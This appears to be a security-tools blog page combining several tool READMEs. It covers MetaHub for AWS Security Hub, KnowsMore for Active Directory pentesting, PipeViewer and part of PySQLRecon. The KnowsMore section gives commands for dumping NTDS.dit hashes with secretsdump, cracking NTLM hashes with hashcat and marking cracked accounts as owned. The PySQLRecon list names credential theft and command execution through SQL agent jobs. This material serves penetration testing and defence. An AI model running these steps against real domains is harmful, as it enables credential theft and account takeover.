  • Tags: Queries tagging from affected resources
  • CloudTrail: Queries CloudTrail in the affected account to identify who created the resource and when, as well as any other related critical events
  • Account: Fetches extra information from the account where the affected resource is running, such as the account name, security contacts, and other information.

MetaHub supports filters on top of these context outputs to automate the detection of other resources with the same issues. You can filter security findings affecting resources tagged in a certain way (e.g., Environment=production) and combine this with filters based on Config or Associations: for example, whether the resource is public, whether it is encrypted, whether it is part of a VPC, or whether it uses a specific IAM role. Refer to Config filters and Tags filters for more information.

But that's not all. If you are using MetaHub with Security Hub, you can even combine the previous filters with the Security Hub native filters (AWS Security Hub filtering). You can filter the same way you would with the AWS CLI utility using the option --sh-filters, but in addition, you can save and re-use your filters as YAML files using the option --sh-template.

If you prefer, you can enrich your findings back in AWS Security Hub using the option --enrich-findings. This action updates your AWS Security Hub findings using the field UserDefinedFields. You can then create filters or Insights directly in AWS Security Hub and take advantage of the contextualization added by MetaHub.

When investigating findings, you may need to update many security findings at once. MetaHub allows you to execute bulk updates to AWS Security Hub findings, such as changing the Workflow Status, using the option --update-findings. For example, say you identified hundreds of security findings about public resources, but based on the MetaHub context you know those resources are not effectively public, as they are protected by routing and firewalls. You can update all the findings from the output of your MetaHub query with one command. When updating findings with MetaHub, you also update the Note field of each finding with custom text for future reference.

MetaHub supports different output modes, some JSON-based (json-inventory, json-statistics, json-short, json-full) and others like the powerful html, xlsx, and csv outputs. These outputs are customizable; you can choose which columns to show. For example, you may need a report about your affected resources that adds the tags Owner, Service, and Environment and nothing else. Check the configuration file and define the columns you need.

MetaHub supports multi-account setups. You can run the tool from any environment by assuming roles in your AWS Security Hub master account and your child/service accounts where your resources live. This allows you to fetch aggregated data from multiple accounts using your AWS Security Hub multi-account implementation while also fetching and enriching those findings with data from the accounts where your affected resources live based on your needs. Refer to Configuring Security Hub for more information.

Customizing Configuration

MetaHub uses configuration files that let you customize some checks behaviors, default filters, and more. The configuration files are located in lib/config/.

Things you can customize:

  • lib/config/configuration.py: This file contains the default configuration for MetaHub. You can change the default filters, the default output modes, the environment definitions, and more.

  • lib/config/impact.py: This file contains the values and weights for the impact formula criteria. You can modify the values and the weights based on your needs.

  • lib/config/resources.py: This file contains definitions for every resource type, like which CloudTrail events to look for.

Run with Python

MetaHub is a Python3 program. You need to have Python3 installed in your system and the required Python modules described in the file requirements.txt.

Requirements can be installed in your system manually (using pip3) or using a Python virtual environment (suggested method).

Run it using Python Virtual Environment

  1. Clone the repository: git clone git@github.com:gabrielsoltz/metahub.git
  2. Change to the repository dir: cd metahub
  3. Create a virtual environment for this project: python3 -m venv venv/metahub
  4. Activate the virtual environment you just created: source venv/metahub/bin/activate
  5. Install Metahub requirements: pip3 install -r requirements.txt
  6. Run: ./metahub -h
  7. Deactivate your virtual environment after you finish with: deactivate

Next time, you only need steps 4 and 6 to use the program.

Alternatively, you can run this tool using Docker.

Run with Docker

MetaHub is also available as a Docker image. You can run it directly from the public Docker image or build it locally.

The available tags for MetaHub containers are the following:

  • latest: in sync with master branch
  • <x.y.z>: you can find the releases here
  • stable: this tag always points to the latest release.

For running from the public registry, you can run the following command:

docker run -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

AWS credentials and Docker

If you are already logged into the AWS host machine, you can seamlessly use the same credentials within a Docker container. You can achieve this by either passing the necessary environment variables to the container or by mounting the credentials file.

For instance, you can run the following command:

docker run -e AWS_DEFAULT_REGION -e AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY -e AWS_SESSION_TOKEN -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

On the other hand, if you are not logged in on the host machine, you will need to log in again from within the container itself.

Build and Run Docker locally

Or you can also build it locally:

git clone git@github.com:gabrielsoltz/metahub.git
cd metahub
docker build -t metahub .
docker run -ti metahub ./metahub -h

Run with Lambda

MetaHub is Lambda/Serverless ready! You can run MetaHub directly on an AWS Lambda function without any additional infrastructure required.

Running MetaHub in a Lambda function allows you to automate its execution based on your defined triggers.

Terraform code is provided for deploying the Lambda function and all its dependencies.

Lambda use-cases

  • Trigger the MetaHub Lambda function each time there is a new security finding to enrich that finding back in AWS Security Hub.
  • Trigger the MetaHub Lambda function each time there is a new security finding for suppression based on Context.
  • Trigger the MetaHub Lambda function to identify the affected owner of a security finding based on Context and assign it using your internal systems.
  • Trigger the MetaHub Lambda function to create a ticket with enriched context.

Deploying Lambda

The terraform code for deploying the Lambda function is provided under the terraform/ folder.

Just run the following commands:

cd terraform
terraform init
terraform apply

The code will create a zip file for the lambda code and a zip file for the Python dependencies. It will also create a Lambda function and all the required resources.

Customize Lambda behaviour

You can customize MetaHub options for your Lambda by editing the file lib/lambda.py. You can change the default options for MetaHub, such as the filters, the Meta* options, and more.

Lambda Permissions

Terraform will create the minimum required permissions for the Lambda function to run locally (in the same account). If you want your Lambda to assume a role in other accounts (for example, if you are executing the Lambda in the Security Hub master account that aggregates findings from other accounts), you will need to specify the role to assume by adding the option --mh-assume-role in the Lambda function configuration (see the previous step) and adding the corresponding policy that allows the Lambda to assume that role to the Lambda role.

Run with Security Hub Custom Action

MetaHub can be run as a Security Hub Custom Action. This allows you to run MetaHub directly from the Security Hub console for a selected finding or for a selected set of findings.


The custom action will then trigger a Lambda function that will run MetaHub for the selected findings. By default, the Lambda function runs MetaHub with the option --enrich-findings, which means it will update your findings back with MetaHub outputs. If you want to change this, see Customize Lambda behaviour.

You need first to create the Lambda function and then create the custom action in Security Hub.

For creating the lambda function, follow the instructions in the Run with Lambda section.

For creating the AWS Security Hub custom action:

  1. In Security Hub, choose Settings and then choose Custom Actions.
  2. Choose Create custom action.
  3. Provide a Name, Description, and Custom action ID for the action.
  4. Choose Create custom action. (Make a note of the Custom action ARN. You need to use the ARN when you create a rule to associate with this action in EventBridge.)
  5. In EventBridge, choose Rules and then choose Create rule.
  6. Enter a name and description for the rule.
  7. For the Event bus, choose the event bus that you want to associate with this rule. If you want this rule to match events that come from your account, select default. When an AWS service in your account emits an event, it always goes to your account's default event bus.
  8. For Rule type, choose a rule with an event pattern and then press Next.
  9. For Event source, choose AWS events.
  10. For the Creation method, choose Use pattern form.
  11. For Event source, choose AWS services.
  12. For AWS service, choose Security Hub.
  13. For Event type, choose Security Hub Findings - Custom Action.
  14. Choose Specific custom action ARNs and add a custom action ARN.
  15. Choose Next.
  16. Under Select targets, choose the Lambda function
  17. Select the Lambda function you created for MetaHub.

AWS Authentication

  • Ensure you have AWS credentials set up on your local machine (or from where you will run MetaHub).

For example, you can use the aws configure command.

aws configure

Or you can export your credentials to the environment.

export AWS_DEFAULT_REGION="us-east-1"
export AWS_ACCESS_KEY_ID="ASXXXXXXX"
export AWS_SECRET_ACCESS_KEY="XXXXXXXXX"
export AWS_SESSION_TOKEN="XXXXXXXXX"

Configuring Security Hub

  • If you are running MetaHub for a single AWS account setup (AWS Security Hub is not aggregating findings from different accounts), you don't need to use any additional options; MetaHub will use the credentials in your environment. Still, if your IAM design requires it, it is possible to log in and assume a role in the same account you are logged in. Just use the options --sh-assume-role to specify the role and --sh-account with the same AWS Account ID where you are logged in.

  • --sh-region: The AWS Region where Security Hub is running. If you don't specify a region, it will use the one configured in your environment. If you are using AWS Security Hub Cross-Region aggregation, you should use that region as the --sh-region option so that you can fetch all findings together.

  • --sh-account and --sh-assume-role: The AWS Account ID where Security Hub is running and the AWS IAM role to assume in that account. These options are helpful when you are logged in to a different AWS account than the one where AWS Security Hub is running, or when running AWS Security Hub in a multi-account setup. Both options must be used together. The role provided needs enough permissions to get and update findings in AWS Security Hub (if needed). If you don't specify --sh-account, MetaHub will assume the account you are logged in to.

  • --sh-profile: You can also provide your AWS profile name to use for AWS Security Hub. When using this option, you don't need to specify --sh-account or --sh-assume-role as MetaHub will use the credentials from the profile. If you are using --sh-account and --sh-assume-role, those options take precedence over --sh-profile.

IAM Policy for Security Hub

This is the minimum IAM policy you need to read and write from AWS Security Hub. If you don't want to update your findings with MetaHub, you can remove the securityhub:BatchUpdateFindings action.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "securityhub:GetFindings",
        "securityhub:ListFindingAggregators",
        "securityhub:BatchUpdateFindings",
        "iam:ListAccountAliases"
      ],
      "Resource": [
        "*"
      ]
    }
  ]
}

Configuring Context

If you are running MetaHub in a multi-account setup (AWS Security Hub is aggregating findings from multiple AWS accounts), you must provide the role to assume for Context queries, because the affected resources are not in the same AWS account as the AWS Security Hub findings. The --mh-assume-role option will be used to connect to the affected resources directly in the affected account. This role needs enough permissions to describe resources.

IAM Policy for Context

The minimum policy needed for context includes the managed policy arn:aws:iam::aws:policy/SecurityAudit and the following actions:

  • tag:GetResources
  • lambda:GetFunction
  • lambda:GetFunctionUrlConfig
  • cloudtrail:LookupEvents
  • account:GetAlternateContact
  • organizations:DescribeAccount
  • iam:ListAccountAliases

Examples

Inputs

MetaHub can read security findings directly from AWS Security Hub using its API. If you don't use Security Hub, you can use any ASFF-based scanner. Most cloud security scanners support the ASFF format. Check with them or leave an issue if you need help.

If you want to read from an input ASFF file, you need to use the options:

./metahub.py --inputs file-asff --input-asff path/to/the/file.json.asff path/to/the/file2.json.asff

You can also combine AWS Security Hub findings with input ASFF files by specifying both inputs:

./metahub.py --inputs file-asff securityhub --input-asff path/to/the/file.json.asff

When using a file as input, you can't use the option --sh-filters for filtering findings, as this option relies on the AWS API. You also can't use the options --update-findings or --enrich-findings, as those findings are not in AWS Security Hub. If you are reading from both sources at the same time, only the findings from AWS Security Hub will be updated.

Output Modes

MetaHub can generate different programmatic and visual outputs. By default, all output modes are enabled: json-short, json-full, json-statistics, json-inventory, html, csv, and xlsx.

The outputs will be saved in the outputs/ folder with the execution date.

If you want only to generate a specific output mode, you can use the option --output-modes with the desired output mode.

For example, if you only want to generate the output json-short, you can use:

./metahub.py --output-modes json-short

If you want to generate json-short, json-full and html outputs, you can use:

./metahub.py --output-modes json-short json-full html

JSON

JSON-Short

Show all findings titles together under each affected resource and the AwsAccountId, Region, and ResourceType:

JSON-Full

Show all findings with all data. Findings are organized by ResourceId (ARN). For each finding, you will also get: SeverityLabel, Workflow, RecordState, Compliance, Id, and ProductArn:

JSON-Inventory

Show a list of all resources with their ARN.

JSON-Statistics

Show statistics for each field/value. In the output, you will see each field/value and the number of occurrences; for example, the following output shows statistics for six findings.

HTML

You can create rich HTML reports of your findings, adding your context as part of them.

HTML Reports are interactive in many ways:

  • You can add/remove columns.
  • You can sort and filter by any column.
  • You can auto-filter by any column
  • You can group/ungroup findings
  • You can also download that data to xlsx, CSV, HTML, and JSON.


CSV

You can create CSV reports of your findings, adding your context as part of them.

 

XLSX

Similar to CSV but with more formatting options.


Customize HTML, CSV or XLSX outputs

You can customize which Context keys to unroll as columns for your HTML, CSV, and XLSX outputs using the options --output-tag-columns and --output-config-columns (as a list of columns). If the keys you specified don't exist for the affected resource, they will be empty. You can also configure these columns by default in the configuration file (See Customizing Configuration).

For example, you can generate an HTML output with tags and add "Owner" and "Environment" as columns to your report using:

./metahub --output-modes html --output-tag-columns Owner Environment

Filters

You can filter the security findings and resources that you get from your source in different ways and combine all of them to get exactly what you are looking for, then re-use those filters to create alerts.

Security Hub Filtering

MetaHub supports filtering AWS Security Hub findings in the form of KEY=VALUE using the option --sh-filters, the same way you would filter using the AWS CLI, but limited to the EQUALS comparison. If you want another comparison, use the option --sh-template (see Security Hub Filtering using YAML templates).

You can check available filters in AWS Documentation

./metahub --sh-filters <KEY=VALUE>

If you don't specify any filters, default filters are applied: RecordState=ACTIVE WorkflowStatus=NEW

Passing filters using this option resets the default filters. If you want to add filters to the defaults, you need to specify them in addition to the default ones. For example, to add SeverityLabel to the default filters:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW

If a value contains spaces, you should enclose it in double quotes: ProductName="Security Hub"

You can add as many different filters as you need to your query, and you can also repeat the same filter key with different values:

Examples:

  • Filter by Severity (CRITICAL):
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL
  • Filter by Severity (CRITICAL and HIGH):
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL SeverityLabel=HIGH
  • Filter by Severity and AWS Account:
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL AwsAccountId=1234567890
  • Filter by Check Title:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW Title="EC2.22 Unused EC2 security groups should be removed"
  • Filter by AWS Resource Type:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup
  • Filter by Resource ID:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceId="arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890"
  • Filter by Finding Id:
./metahub --sh-filters Id="arn:aws:securityhub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.19/finding/01234567890-1234-1234-1234-01234567890"
  • Filter by Compliance Status:
./metahub --sh-filters ComplianceStatus=FAILED

Security Hub Filtering using YAML templates

MetaHub lets you create complex filters using YAML files (templates) that you can re-use when needed. YAML templates let you write filters using any comparison supported by AWS Security Hub, such as 'EQUALS', 'PREFIX', 'NOT_EQUALS', or 'PREFIX_NOT_EQUALS'. You can call your YAML file using the option --sh-template <FILE>.

You can find examples under the folder templates

  • Filter using YAML template default.yml:
./metahub --sh-template templates/default.yml
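As a rough illustration, a template pairs each filter key with a comparison and a value. The shape below is an assumption that mirrors the AWS Security Hub filter format, and prefix.yml is a hypothetical file name; check the files under the templates folder for the exact schema MetaHub expects:

# Hypothetical template shape (mirrors the AWS Security Hub filter format)
cat > templates/prefix.yml <<'EOF'
RecordState:
  - Comparison: EQUALS
    Value: ACTIVE
Title:
  - Comparison: PREFIX
    Value: EC2
EOF
./metahub --sh-template templates/prefix.yml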

Config Filters

MetaHub supports Config filters (and associations) using KEY=VALUE where the value can only be True or False using the option --mh-filters-config. You can use as many filters as you want and separate them using spaces. If you specify more than one filter, you will get all resources that match all filters.

Config filters only support True or False values:

  • A Config filter set to True matches resources where the check is True or returns data.
  • A Config filter set to False matches resources where the check is False or returns no data.

Config filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Context for the AWS-affected resources based on the previous list of findings.
  3. MetaHub only shows you the resources that match your --mh-filters-config, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are associated to Network Interfaces (network_interfaces=True):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-config network_interfaces=True
  • Get all S3 Buckets (ResourceType=AwsS3Bucket) only if they are public (public=True):
./metahub --sh-filters ResourceType=AwsS3Bucket --mh-filters-config public=True

Tags Filters

MetaHub supports Tags filters in the form of KEY=VALUE where KEY is the Tag name and value is the Tag Value. You can use as many filters as you want and separate them using spaces. Specifying multiple filters will give you all resources that match at least one filter.

Tags filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Tags for the AWS-affected resources based on the previous list of findings.
  3. MetaHub only shows you the resources that match your --mh-filters-tags, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are tagged with a tag Environment and value Production:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-tags Environment=Production
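Because all the filter types can be combined (see Filters above), you can chain Security Hub, Config, and Tags filters in a single query. As a sketch reusing keys shown elsewhere in this document, this would return public S3 buckets tagged Environment=Production:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsS3Bucket --mh-filters-config public=True --mh-filters-tags Environment=Production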

Updating Workflow Status

You can use MetaHub to update the workflow status (NOTIFIED, NEW, RESOLVED, SUPPRESSED) of your AWS Security Hub findings with a single command. You will use the --update-findings option to update all the findings from your MetaHub query. This means you can update one, ten, or thousands of findings using only one command. The AWS Security Hub API is limited to 100 findings per update, so MetaHub will split your results into chunks of 100 items to avoid this limitation and update your findings regardless of their number.

For example, using the following filter: ./metahub --sh-filters ResourceType=AwsSageMakerNotebookInstance RecordState=ACTIVE WorkflowStatus=NEW I found two affected resources with three findings each, making six Security Hub findings in total.

Running the following update command will update those six findings' workflow status to NOTIFIED with a Note:

./metahub --update-findings Workflow=NOTIFIED Note="Enter your ticket ID or reason here as a note that you will add to the finding as part of this update."




The --update-findings will ask you for confirmation before updating your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Enriching Findings

You can use MetaHub to enrich back your AWS Security Hub Findings with Context outputs using the option --enrich-findings. Enriching your findings means updating them directly in AWS Security Hub. MetaHub uses the UserDefinedFields field for this.

By enriching your findings directly in AWS Security Hub, you can take advantage of features like Insights and Filters by using the extra information not available in Security Hub before.

For example, to enrich all AWS Security Hub findings with WorkflowStatus=NEW, RecordState=ACTIVE, and ResourceType=AwsS3Bucket that are public (public=True) with Context outputs:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsS3Bucket --mh-filters-config public=True --enrich-findings



The --enrich-findings will ask you for confirmation before enriching your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Findings Aggregation

Working with Security Findings sometimes introduces the problem of Shadowing and Duplication.

Shadowing is when two checks refer to the same issue, but one is more generic than the other.

Duplication is when you use more than one scanner and get the same issue reported by more than one of them.

Think of a Security Group with port 3389/TCP open to 0.0.0.0/0. Let's use Security Hub findings as an example.

If you are using one of the default Security Standards like AWS-Foundational-Security-Best-Practices, you will get two findings for the same issue:

  • EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports
  • EC2.19 Security groups should not allow unrestricted access to ports with high risk

If you are also using the standard CIS AWS Foundations Benchmark, you will also get an extra finding:

  • 4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389

Now, imagine that the SG is not in use. In that case, Security Hub will show a fourth finding for your resource!

  • EC2.22 Unused EC2 security groups should be removed

So now you have four findings for one resource in your dashboard!

Suppose you are working with multi-account setups and many resources. In that case, this could result in many findings that refer to the same thing without adding any extra value to your analysis.

MetaHub aggregates security findings under the affected resource.

This is how MetaHub shows the previous example with output-mode json-short:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
"EC2.19 Security groups should not allow unrestricted access to ports with high risk",
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports",
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389",
"EC2.22 Unused EC2 security groups should be removed"
],
"AwsAccountId": "01234567890",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

This is how MetaHub shows the previous example with output-mode json-full:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
{
"EC2.19 Security groups should not allow unrestricted access to ports with high risk": {
"SeverityLabel": "CRITICAL",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",< br/> "Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.22 Unused EC2 security groups should be removed": {
"SeverityLabel": "MEDIUM",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
}
],
"AwsAccountId": "01234567890",
"AwsAccountAlias": "obfuscated",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

Your findings are combined under the ARN of the resource affected, ending in only one result or one non-compliant resource.

You can now work in MetaHub with these four findings together as if they were only one. For example, you can update the Workflow Status of all four findings using only one command: see Updating Workflow Status.

Contributing

You can follow the Context module guide if you want to contribute to the Context module.



KnowsMore - A Swiss Army Knife Tool For Pentesting Microsoft Active Directory (NTLM Hashes, BloodHound, NTDS And DCSync)

By: Zion3R


KnowsMore officially supports Python 3.8+.

Main features

  • Import NTLM Hashes from .ntds output txt file (generated by CrackMapExec or secretsdump.py)
  • Import NTLM Hashes from NTDS.dit and SYSTEM
  • Import Cracked NTLM hashes from hashcat output file
  • Import BloodHound ZIP or JSON file
  • BloodHound importer (import JSON to Neo4J without BloodHound UI)
  • Analyse password quality (length, lower case, upper case, digits, special characters and Latin characters)
  • Analyse password similarity with the company name and user names
  • Search for users, passwords and hashes
  • Export all cracked credentials direct to BloodHound Neo4j Database as 'owned object'
  • Other amazing features...

Getting stats

knowsmore --stats

This command will produce several statistics about the passwords, like the output below.

KnowsMore v0.1.4 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore

[+] Startup parameters
command line: knowsmore --stats
module: stats
database file: knowsmore.db

[+] start time 2023-01-11 03:59:20
[?] General Statistics
+-------+----------------+-------+
| top | description | qty |
|-------+----------------+-------|
| 1 | Total Users | 95369 |
| 2 | Unique Hashes | 74299 |
| 3 | Cracked Hashes | 23177 |
| 4 | Cracked Users | 35078 |
+-------+----------------+-------+

[?] General Top 10 passwords
+-------+-------------+-------+
| top | password | qty |
|-------+-------------+-------|
| 1 | password | 1111 |
| 2 | 123456 | 824 |
| 3 | 123456789 | 815 |
| 4 | guest | 553 |
| 5 | qwerty | 329 |
| 6 | 12345678 | 277 |
| 7 | 111111 | 268 |
| 8 | 12345 | 202 |
| 9 | secret | 170 |
| 10 | sec4us | 165 |
+-------+-------------+-------+

[?] Top 10 weak passwords by company name similarity
+-------+--------------+---------+----------------------+-------+
| top | password | score | company_similarity | qty |
|-------+--------------+---------+----------------------+-------|
| 1 | company123 | 7024 | 80 | 1111 |
| 2 | Company123 | 5209 | 80 | 824 |
| 3 | company | 3674 | 100 | 553 |
| 4 | Company@10 | 2080 | 80 | 329 |
| 5 | company10 | 1722 | 86 | 268 |
| 6 | Company@2022 | 1242 | 71 | 202 |
| 7 | Company@2024 | 1015 | 71 | 165 |
| 8 | Company2022 | 978 | 75 | 157 |
| 9 | Company10 | 745 | 86 | 116 |
| 10 | Company21 | 707 | 86 | 110 |
+-------+--------------+---------+----------------------+-------+

Installation

Simple

pip3 install --upgrade knowsmore

Note: If you face problems with dependency versions, check the Virtual ENV file.

Execution Flow

There is no mandatory order for importing data, but to get better correlation we suggest the following execution flow (a combined sketch follows the list):

  1. Create database file
  2. Import BloodHound files
    1. Domains
    2. GPOs
    3. OUs
    4. Groups
    5. Computers
    6. Users
  3. Import NTDS file
  4. Import cracked hashes
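Putting it together, a minimal end-to-end sketch built from the commands covered in the sections below (the file paths are placeholders):

knowsmore --create-db
knowsmore --bloodhound --import-data ~/Desktop/client.zip
knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds
knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt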

Create database file

All data are stored in a SQLite Database

knowsmore --create-db

Importing BloodHound files

We can import full BloodHound files into KnowsMore, correlate the data, and sync it to the Neo4j BloodHound database. This way you can use KnowsMore alone to import JSON files directly into the Neo4j database instead of using the extremely slow BloodHound user interface.

# Bloodhound ZIP File
knowsmore --bloodhound --import-data ~/Desktop/client.zip

# Bloodhound JSON File
knowsmore --bloodhound --import-data ~/Desktop/20220912105336_users.json

Note: KnowsMore can import both BloodHound ZIP and JSON files, but we recommend using the ZIP file, because KnowsMore will automatically order the files for better data correlation.

Sync data to Neo4j BloodHound database

# Bloodhound ZIP File
knowsmore --bloodhound --sync 10.10.10.10:7687 -d neo4j -u neo4j -p 12345678

Note: The KnowsMore implementation of the bloodhound-importer was inspired by the Fox-IT BloodHound Import implementation. We made several changes to save all data in the KnowsMore SQLite database and then perform an incremental sync to the Neo4j database. This strategy brings several benefits, such as being at least 10x faster than the original BloodHound user interface.

Importing NTDS file

Option 1

Note: Import hashes and clear-text passwords directly from NTDS.dit and SYSTEM registry

knowsmore --secrets-dump -target LOCAL -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM

Option 2

Note: First use secretsdump.py to extract the NTDS hashes with the command below

secretsdump.py -ntds ntds.dit -system system.reg -hashes lmhash:ntlmhash LOCAL -outputfile ~/Desktop/client_name

After that import

knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds

Generating a custom wordlist

knowsmore --word-list -o "~/Desktop/Wordlist/my_custom_wordlist.txt" --batch --name company_name

Importing cracked hashes

Cracking hashes

First extract all hashes to a txt file

# Extract NTLM hashes to file
knowsmore --ntlm-hash --export-hashes "~/Desktop/ntlm_hash.txt"

# Or, extract NTLM hashes from NTDS file
cat ~/Desktop/client_name.ntds | cut -d ':' -f4 > ntlm_hashes.txt

To crack the hashes, I usually use hashcat with the commands below

# Wordlist attack
hashcat -m 1000 -a 0 -O -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" "~/Desktop/Wordlist/*"

# Mask attack
hashcat -m 1000 -a 3 -O --increment --increment-min 4 -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" ?a?a?a?a?a?a?a?a

Importing hashcat output file

knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt

Note: Change clientCompanyName to the name of your company

Wipe sensitive data

As passwords and their hashes are extremely sensitive data, there is a module to replace the clear-text passwords and their respective hashes.

Note: This command will keep all generated statistics and imported user data.

knowsmore --wipe

BloodHound Mark as owned

One User

During an assessment you may find a user's password (in several ways), so you can add it to the KnowsMore database

knowsmore --user-pass --username administrator --password Sec4US@2023

# or adding the company name

knowsmore --user-pass --username administrator --password Sec4US@2023 --company sec4us

Integrate all credentials cracked to Neo4j Bloodhound database

knowsmore --bloodhound --mark-owned 10.10.10.10 -d neo4j -u neo4j -p 123456

For remote connections, make sure the Neo4j database server accepts remote connections: change the line below in the config file /etc/neo4j/neo4j.conf and restart the service.

server.bolt.listen_address=0.0.0.0:7687


PipeViewer - A Tool That Shows Detailed Information About Named Pipes In Windows

By: Zion3R


A GUI tool for viewing Windows Named Pipes and searching for insecure permissions.

The tool was published as part of a research about Docker named pipes:
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 1"
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 2"

Overview

PipeViewer is a GUI tool that allows users to view details about Windows Named pipes and their permissions. It is designed to be useful for security researchers who are interested in searching for named pipes with weak permissions or testing the security of named pipes. With PipeViewer, users can easily view and analyze information about named pipes on their systems, helping them to identify potential security vulnerabilities and take appropriate steps to secure their systems.


Usage

Double-click the EXE binary and you will get the list of all named pipes.

Build

We used Visual Studio to compile it.
When downloading it from GitHub you might get blocked-file errors; you can use PowerShell to unblock the files:

Get-ChildItem -Path 'D:\tmp\PipeViewer-main' -Recurse | Unblock-File

Warning

We built the project and uploaded it, so you can find it in the releases.
One problem is that the binary will trigger alerts from Windows Defender, because it uses the NtObjectManager package, which is flagged as a virus.
Note that James Forshaw talked about it here.
We can't change this because we depend on that third-party DLL.

Features

  • A detailed overview of named pipes.
  • Filter\highlight rows based on cells.
  • Bold specific rows.
  • Export\Import to\from JSON.
  • PipeChat - create a connection with available named pipes.

Demo

PipeViewer3_v1.0.mp4

Credit

We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get information about named pipes.

License

Copyright (c) 2023 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE for more details.

References

For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



PySQLRecon - Offensive MSSQL Toolkit Written In Python, Based Off SQLRecon

By: Zion3R


PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.


Install

PySQLRecon can be installed with pip3 install pysqlrecon or by cloning this repository and running pip3 install .

Commands

All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV] require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM] can likely be run by normal users and do not require elevated privileges.

Support for impersonation ([I]) or execution on linked servers ([L]) are denoted at the end of the command description.

adsi         [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
agentcmd     [PRIV] Execute a system command using agent jobs [I,L]
agentstatus  [PRIV] Enumerate SQL agent status and jobs [I,L]
